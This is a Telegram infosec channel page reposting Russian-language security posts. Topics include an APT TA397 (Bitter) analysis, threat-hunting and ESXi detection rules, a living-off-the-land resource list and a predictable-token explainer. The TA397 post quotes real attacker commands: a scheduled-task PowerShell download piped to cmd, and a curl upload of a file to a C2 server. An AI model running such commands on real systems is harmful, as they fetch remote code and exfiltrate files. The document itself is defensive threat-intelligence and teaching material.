اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
Fsecurity | HH
رفتن به کانال در Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
نمایش بیشتر2 018
مشترکین
اطلاعاتی وجود ندارد24 ساعت
+27 روز
-1130 روز
آرشیو پست ها
2 017
Repost from Whitehat Lab
🙃 HTB Certified Active Directory Pentesting Expert (HTB CAPE)
Как и обещал, выкладываю обзор
Вопросы автору можно задать в чате или комментариях
Недавно я завершил курс и успешно сдал экзамен HTB Certified Active Directory Pentesting Expert (CAPE) от Hack The Box Academy. Меня зовут Артём Метельков, я занимаюсь пентестами инфраструктуры и фишинг-атаками. В этом обзоре поделюсь своими впечатлениями и расскажу, что вас ждёт на пути к этой сертификации. HTB CAPE - это чисто практическая штука. Тут не просто учат, а реально проверяют, как ты усвоил материал. Экзамен - это стенд с 10+ машинами, несколькими доменами и разными трастами между ними. В общем, всё как в реальной жизни.🔗 Пентест AD на максималках, мой опыт HTB CAPE Коротко о курсе: Интенсивный обучающий курс, который охватывает широкий спектр техник и инструментов для проведения пентеста 💻 Active Directory. Курс не предназначен для начинающих в области кибербезопасности, а вот опытные специалисты смогут найти для себя много полезного #htb #cert #exam ✈️ Whitehat Lab 💬Chat
2 017
Repost from ESCalator
Мутация Exchange. Как мы аномалии в Outlook-страницах ловили 😮
В продолжение историй с расследований инцидентов (о них можно почитать вот тут, здесь и частично послушать тут) мы решили проанализировать общую концепцию вставок вредоносного кода в страницы аутентификации Microsoft Outlook. В итоге:
• Помимо обнаруженного на расследованиях инцидентов кейлоггера, обнаружили множество других аналогичных вредоносов.
• Ключевое отличие всех вредоносных фрагментов кода заключается в способе отправки учетных данных жертв: в нем применяются сохранение данных в файл на сервере, DNS-туннелирование, отправка сообщений в телеграм-бота и другие техники.
• Заражения были обнаружены в 26 странах. Большинство скомпрометированных серверов находятся во Вьетнаме, Китае, России, Тайване.
• Как показывает статистика, основная причина успешных атак на серверы — отсутствие установленных обновлений безопасности; на 3 из 65 серверов обновления отсутствовали с 2013 года.
📫 Какие кейлоггеры были обнаружены, куда и как хакеры отправляют данные жертв и как обнаружить вредоносный код в странице Outlook, рассказали в нашем исследовании.
#TI #IR #Malware
@ptescalator
2 017
Repost from Threat Hunting Father 🦔
+5
🕵️ Как из одного IP вытянуть больше информации
Во время TH или анализа инцидента часто всё начинается с одного объекта — подозрительного IP-адреса/домена. Но за ним может стоять целый кластер C2, фишинговых доменов и прокси.
📦 Что делать дальше?
Провести инфраструктурную разведку: поиск связей, повторно используемых конфигураций и других узлов.
🛠 Часть полезных инструментов:
▪️ Whois / Passive DNS
▪️ Shodan, Censys
▪️ VirusTotal, AbuseIPDB
▪️ Hunt.io
🔍 Сегодня рассмотрим пример Hunt.io
1. Старт с IP
Адрес
168.100.9[.]71 всплыл в фиде/иницденте как подозрительный.
2. Базовая инфа
📍 Хостинг: BL Networks (анонимные VPS)
📛 Домен: btc-winnings-made[.]com → намёк на криптоскам
📌 Один домен на IP → не shared-хостинг → признак выделенного C2
3. Порты и сервисы
Открыты 22 (SSH), 80, 443.
Nginx, ответ на 443 — 404 с заглушкой.
⚠️ Признаков Cobalt Strike или чего-то редкого — нет.
4. Сертификаты
🔐 Self-signed, CN = localhost, Issuer = Internet Widgits Pty Ltd
🧬 Используем JA4X фингерпринт → ищем похожие конфигурации
5. SQL-поиск в Hunt
По JA4X найдено всего 6 хостов → высокая уникальность → можно связывать в одну группу.
6. Проверка в VirusTotal
Часть адресов детектится, есть упоминание Latrodectus (модульная малварь).
Изолированный IP оказался частью скрытой инфраструктуры.
✔️ Из одного IP получен кластер из нескольких C2-хостов
✔️ Методика применима для охоты на инфраструктуру до компрометации
✔️ Позволяет строить детект на основе поведения: VPS-провайдер, TLS-паттерны, конфигурации, а не конкретные адреса
🔗https://hunt.io/blog/practical-guide-unconvering-malicious-infrastructure
🦔 THF2 017
Repost from Threat Hunting Father 🦔
+3
🧵 TA397 (Bitter)
📌 Новый отчёт от Proofpoint и Threatray раскрывает, как на протяжении 8 лет предположительно индийская APT-группа TA397 ведёт разведку против дипмиссий, правительств и оборонных структур в Европе и Азии.
TA397 will frequently target organizations and entities in Europe that have interests or a presence in China, Pakistan, and other neighboring countries on the Indian subcontinent.☕ Немного контекста Группа давно известна под именем Bitter и подозревается в работе на индийские интересы. Но вместо сложных эксплойтов — ставка на точный фишинг и нестандартный подход к Scheduled Tasks. Работают строго по графику — 9:00–17:00 по IST, как в офисе.
TA397’s hands-on-keyboard and infrastructure operations align with the standard working hours of the Indian Standard Time (IST) timezone.✉️ Входной вектор: дипломатия, CHM и .MSC TA397 маскируются под посольства, министерства и оборонные ведомства. Темы писем максимально приближены к реальности:
"AUTHORIZATION TO RENEW CONTRACTS OF ECD AGENTS"
"SituationNote : SouthKorea_Martial law"
"Note from Embassy of Mauritius"
"Key National Defense R&D Projects"
Вложения — RAR-архивы с .CHM, .LNK, .MSC. Изредка — IQY и Access DB.
⚙️ Цепочки заражения
🎣 Email → архив → файл → PowerShell → Scheduled Task → C2
Пример: MSC-файл запускает mmc.exe, который создаёт задачу через schtasks, использует conhost.exe и PowerShell
🔍 Команда, достойная отдельной кружки чая
"C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm 'woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME' -OutFile 'kwe.cc'; Get-Content 'kwe.cc' | cmd"
Что тут:
ping → создаёт задержку
schtasks создаёт задачу
PowerShell качает скрипт, читает его и передаёт в cmd
📌 C2-запросы всегда включают COMPUTERNAME и USERNAME — иногда через *, .., --, ; и даже __ — чтобы запутать сигнатуры.
🎯 Ручной контроль
После успешной установки задачи, TA397 ждут, и только если цель «интересна», загружают RAT (например, Demon Agent или BDarkRAT). Примеры активности:
curl -X POST -F "file=@C:\\programdata\\abc1.pdf" http://1.1.1[.]1/svupfl.php?oi=HOST_USER
Собирают systeminfo, tasklist, wmic
Иногда монтируют удалённую шару \\IP\tempy, откуда грузят RAT’ы (wmRAT, MiyaRAT)
Упаковка PE-файлов вручную: sh1.txt + sh2.txt = shh.exe
🧠 Детект
1. conhost в headless-режиме
event_type: "processcreatewin"
AND proc_file_name: "conhost.exe"
AND cmdline: "headless"
2. PowerShell → Get-Content → cmd
event_type: "processcreatewin"
AND proc_file_name: "powershell.exe"
AND cmdline: ("get-content" AND "cmd")
3. C2-сервер с Let’s Encrypt + PHP endpoint + имя машины
https://domain[.]com/sdf.php?fv=HOST*USER
Весь материал в пост не уместить, поэтому к прочтению:
🔗 https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one
🔗 https://www.threatray.com/blog/the-bitter-end-unraveling-eight-years-of-espionage-antics-part-two
🦔 THF2 017
Repost from Blue (h/c)at Café
😊 API Gateway как линия фронта в Web3
Внимание: CatSwap в этом тексте — не стартап и не “очередной ”, а наш pet-проект для иллюстрации. Он нужен, чтобы показать, как Web3-сервисы должны мыслить в части защиты API — не опираясь на бэкэнд, а начиная с Gateway.В Web3 большинство угроз входит не через «модные» DeFi-примитивы, а через вполне классический API-интерфейс. Просто формат другой: не form-data, а подписанный JSON с маршрутом, суммой и временной меткой. CatSwap, как агрегатор, — типичный пример. Все транзакции, котировки, swap-запросы проходят через публичное API. ✅ Чеклист по защите API Gateway ▫️ HTTPS (TLS 1.2+) + WAF • Принудительное HTTPS; • WAF / WAF с OWASP CRS, бот-контролем и Geo-ACL. ▫️ Аутентификация • JWT в
envoy.filters.http.jwt_authn;
• Web3-подписи (EIP-191/712) через Proxy-Wasm (X-Address + X-Signature);
• Challenge-nonce, защита от replay-атак.
▫️ Авторизация (OPA / ExtAuthz)
• RBAC/ABAC-политики по ролям, slippageTolerance, gasPrice, геопозиция, времени суток;
• Динамические политики Rego + GitOps-репозиторий.
▫️ JSON-валидация запросов
• OpenAPI-схемы → Envoy JSON Validator, ошибка 400 при несоответствии;
• Чёткое разделение обязательных и опциональных полей.
▫️ Rate Limit & QoS
• /v1/quote ≤ 1000 r/m; /v1/swap ≤ 100 r/m;
• Circuit breaker, retry, max concurrent;
• Приоритет маршрутов, Kubernetes Resource Limits.
▫️ API Gateway (Envoy + Proxy-Wasm)
• JWT (RS256) через envoy.filters.http.jwt_authn;
• JSON Schema Validator — строгая валидация payload;
• Rate-limit, circuit breaker, retry с экспоненциальным backoff;
• ExtAuthz → ML-анализ;
• mTLS внутри кластера (Istio-SDS или Envoy native).
▫️ Логирование & мониторинг
• JSON Access Logs (path, key, user_id, latency, tx_hash);
• Prometheus (p95/p99, ошибки, RPS) / Grafana—дашборды;
• OpenTelemetry + Jaeger; трассировка end-to-end;
• GitOps-аудит конфигов (ArgoCD/Flux).
▫️ Management plane hardening
• Bastion-host с MFA для доступа к административным интерфейсам;
• Жёсткие IAM-роли и Just-In-Time elevation для операторов.
▫️ CI/CD & GitOps
• Инфраструктура как код (Terraform, Helm);
• ArgoCD синхронизация; PR-ревью, tfsec/checkov, canary-релизы.
▫️ Supply chain security & SBOM
• Генерация и хранение SBOM для всех контейнеров и зависимостей;
• Подпись артефактов (cosign/Sigstore) и верификация на этапе деплоя.
▫️ Контроль изменений и drift detection
• Policy as Code (OPA, Terraform Sentinel);
• Инструменты проверки конфигураций (tfsec, Checkov, Conftest).
▫️ ML-анализ в Gateway 💻
• Isolation Forest в Seldon Core; Envoy ExtAuthz вызывает /predict;
• Блокировка при score > 0.8; алёрты в SIEM/Slack.
▫️ API lifecycle & versioning
• Явное управление версиями API, deprecation-policy, backward-compatibility тесты;
• Тёмные и канареечные запуски (traffic mirroring) новых эндпоинтов.
▫️ Disaster recovery & multi-region failover
• Репликация Gateway в нескольких регионах; автоматический DNS-фейловер;
• Документированные RTO/RPO и регулярные drill-тесты.
▫️ Пентесты & Bug Bounty
• Ежеквартальные внешние пентесты API Gateway и RPC-узлов;
• Запуск программы Bug Bounty (HackerOne / Standoff / bizone) для непрерывного обнаружения уязвимостей.
▫️ План реагирования на инциденты (по просьбе SOC)
• Определённые playbook: detection → containment → eradication → recovery;
• SLA/TTR для критичных сервисов; регулярные учения.
▫️ Приватные RPC (PrivateLink / IAM)
• JSON-RPC узлы скрыты за VPC Endpoint (PrivateLink / PSC);
• Доступ по SigV4 / ACL; rate-limit и circuit breaker перед нодами.
▫️ HTTP-security headers
• HSTS (Strict-Transport-Security), CSP, X-Frame-Options, X-Content-Type-Options;
• Защита от clickjacking и MIME-sniffing.
▫️ Сегментация сети и ограничения доступа
• Kubernetes NetworkPolicies; NSG/Security Groups;
• Микросегментация: отдельные VPC/subnet для критичных сервисов.
🔫 А зачем
В общем, это не просто чеклист для галочки. Это попытка собрать разумную, масштабируемую и живучую архитектуру, в которой API Gateway — не прослойка между интернетом и микросервисами, а полноценная точка принятия решений.
#appsec2 017
Repost from PurpleBear
Всем привет!
В процессе подготовки одной презентации собирал список ресурсов с описанием
Living off the land (LotL) техник атакующих, которым хотел бы поделиться в этой заметке:
🔴 LOLBAS
Список бинарных файлов, скриптов и библиотек, для реализации LotL техник
🔴 GTFOBins
Список бинарных файлов Unix, которые можно использовать для обхода локальных ограничений безопасности в неправильно сконфигурированных системах
🔴 LOOBins
Консолидированный список built-in macOS утилит с подробным описанием
🔴 GTFOArgs
Список бинарных файлов Unix, аргументы которых можно использовать для реализации LotL техник
🔴 LOTTunnels
Консолидированный список различных инструментов для туннелирования трафика, которые используются злоумышленниками для обеспечения доступа и извлечения информации
🔴 LOLDrivers
Список драйверов Windows, которые активно используются в дикой природе
🔴 LOLApps
Небольшой список built-in and third-party приложений для Windows и Linux для реализации LotL техник
🔴 LOLESXI
Список бинарей и скриптов доступных по дефолту в VMware ESXi, которые можно использовать для реализации LotL техник
🔴 LOLCerts
Список утекших code signing сертификатов, которые активно используются в дикой природе
🔴 LOLAD
Список AD’s built-in tools с командами и детальным описанием реализации LotL техник
🔴 LOTS
Список ресурсов, используемых для создания атакующей инфраструктуры (фишинг, С2, эксфильтрация)
🔴 MalAPI
Корреляция вызовов Windows API с техниками, используемыми вредоносным ПО в дикой природе
🔴 FileExtension
Список расширений файлов, которые используются для доставки полезной нагрузки
🔴 Bootloaders
Список вредоносных загрузчиков для различных ОС, которые используются в дикой природе со ссылками на IOC и правила обнаружения (YARA, Sigma)
Я уверен, что этот список далеко не полный, поэтому если знаете еще LotL ресурсы, очень прошу поделиться в комментариях к этому посту🙏
PS: Желаю всем хорошего понедельника и удачной короткой недели!2 017
Repost from s0ld13r ch.
VMware ESXi Detection Engineering 🛡
T1021.004 Remote Services: SSH, On ESXi, SSH can be enabled either directly on the host (e.g., via vim-cmd hostsvc/enable_ssh) or via vCenterESXi становится все большим любимцем для атакующих, в том числе и АРТ, но часто обделен вниманием со стороны команд аналитиков, поэтому накидал ряд базовых правил для детектов аномалий в сети 😒 Включение авторизации по SSH
message: "SSH login enabled"message: ("sshd" and "connection from")message: "Interactive shell session started"2 017
Repost from Что-то на пентестерском
⛈Небезопасная генерация токена
Что может быть проще: сброс пароля, подтверждение почты или аутентификация по токену? Но если ваш токен генерируется геморройно простым методом — у злоумышленника появляется прямой доступ к системе. Давайте разберёмся, почему до сих пор взламываются даже крупные сервисы и почему “уникальный токен” — не всегда синоним безопасности.
🟢 Как появляется проблема:
Иногда разработчики генерят токены через стандартные функции вроде
rand() или time(), добавляя к ним user_id или инкрементный счетчик. Примеры из реального мира:
- Сброс пароля: token = md5(time() . user_id)
- Авторизация: просто strval(rand())
❗️По факту — это не токен, а открытая дверь, где “замок” известен каждому умеющему читать код. Если сервер при отправке ссылки для сброса пароля проверяет только такой токен — любой, у кого есть доступ к user_id и времени генерации, сможет подобрать нужное значение и получить доступ к чужому аккаунту.
🔊 Как это эксплуатируют:
Самый частый паттерн:
1. Изучаем токен — часто можно декодировать его, видим время или user_id.
2. Получаем user_id жертвы (через API или просто по URL).
3. Генерируем гипотетические значения токена по шаблону, который использует сервер.
4. Подставляем их в запрос — вход срабатывает. Профит.
📌 Даже хуже, если используется стандартный rand() на популярных языках — достаточно знать seed или время запуска генератора, чтобы воспроизвести последовательность токенов полностью (пример: предсказуемые токены сброса пароля в старых версиях некоторых CMS).
🔔 Как делать правильно?
Используйте только криптографически стойкие генераторы случайных чисел:
- Для PHP: random_bytes() и bin2hex()
- Для Python: secrets.token_urlsafe()
- Для Node.js: crypto.randomBytes()
Короче — никогда не генерируйте security-токены с помощью наивных функций и не смешивайте их с очевидными константами (user_id, timestamp и прочее)! Любой аудитор кода обязан сразу поднимать тревогу, видя старые добрые md5(time()).
Когда вы в последний раз проверяли генерацию токенов в своем проекте? Поделитесь кейсами — у кого встречались "простейшие" реализации? 👀
📶 Полезная ссылка: https://cqr.company/ru/web-vulnerabilities/insecure-token-generation/
ЧТНП | #web2 017
Repost from Whitehat Lab
🚩 VKACTF 2025
Решения задач на прошедший VKACTF, в котором приняли участие и заняли 2ое место
💻 Райтапы
🔗 Site
🔗 Scoreboard
#ctf #vkactf2025
✈️ Whitehat Lab 💬Chat
